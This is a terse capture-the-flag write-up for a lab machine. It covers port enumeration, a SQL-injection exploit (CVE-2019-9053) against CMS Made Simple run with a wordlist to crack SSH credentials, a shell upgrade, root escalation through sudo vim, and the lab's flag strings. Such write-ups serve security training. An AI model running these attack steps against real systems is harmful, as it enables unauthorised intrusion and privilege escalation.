# ip address : 10.10.24.237
-10.10.125.244

# ports :

21 ftp 
80 http
2222 open ssh
	ssh-hostkey : 
	2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)

 
# enumeration :
/simple 
	cms (cmsms), if scroll we find version 2.2.8
/server-status => forbidden

# find exploit : 
use searchsploit : searchsploit CMS Made simple | grep "2.x*"
result : CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py

use exploit-db to find cve number : CVE-2019-9053

it's a sql injection so sqli

after i still use searchsploit with "searchsploit -p 46635" to dl the script and use the exploit-db doc to read script and use good flags : -u for url, -c and -w
think after i will be able to connect in ssh with a account 
python /opt/searchsploit/exploits/php/webapps/46635.py -u https://10.10.125.244/ -c -w /usr/share/wordlists/rockyou.txt
result : 
username : mitch and pass cracked : secret
so use this to go in ssh and upgrade shell with python -c 'import pty; pty.spawn("/bin/bash")'
after pwd : /home/mitch
ls -la : 
drwxr-x--- 3 mitch mitch 4096 aug 19  2019 .
drwxr-xr-x 4 root  root  4096 aug 17  2019 ..
-rw------- 1 mitch mitch  178 aug 17  2019 .bash_history
-rw-r--r-- 1 mitch mitch  220 sep  1  2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3771 sep  1  2015 .bashrc
drwx------ 2 mitch mitch 4096 aug 19  2019 .cache
-rw-r--r-- 1 mitch mitch  655 mai 16  2017 .profile
-rw-rw-r-- 1 mitch mitch   19 aug 17  2019 user.txt
-rw------- 1 mitch mitch  515 aug 17  2019 .viminfo
=> cat user.txt : G00d j0b, keep up!

try sudo -l and find /usr/bin/vim 
search exploit and leverage privilege in GTFOBins with vim search : https://gtfobins.github.io/gtfobins/vim/
=> sudo vim -c ':!/bin/sh'
=> whoami : root !!!! 
ls -la : root.txt : W3ll d0n3. You made it!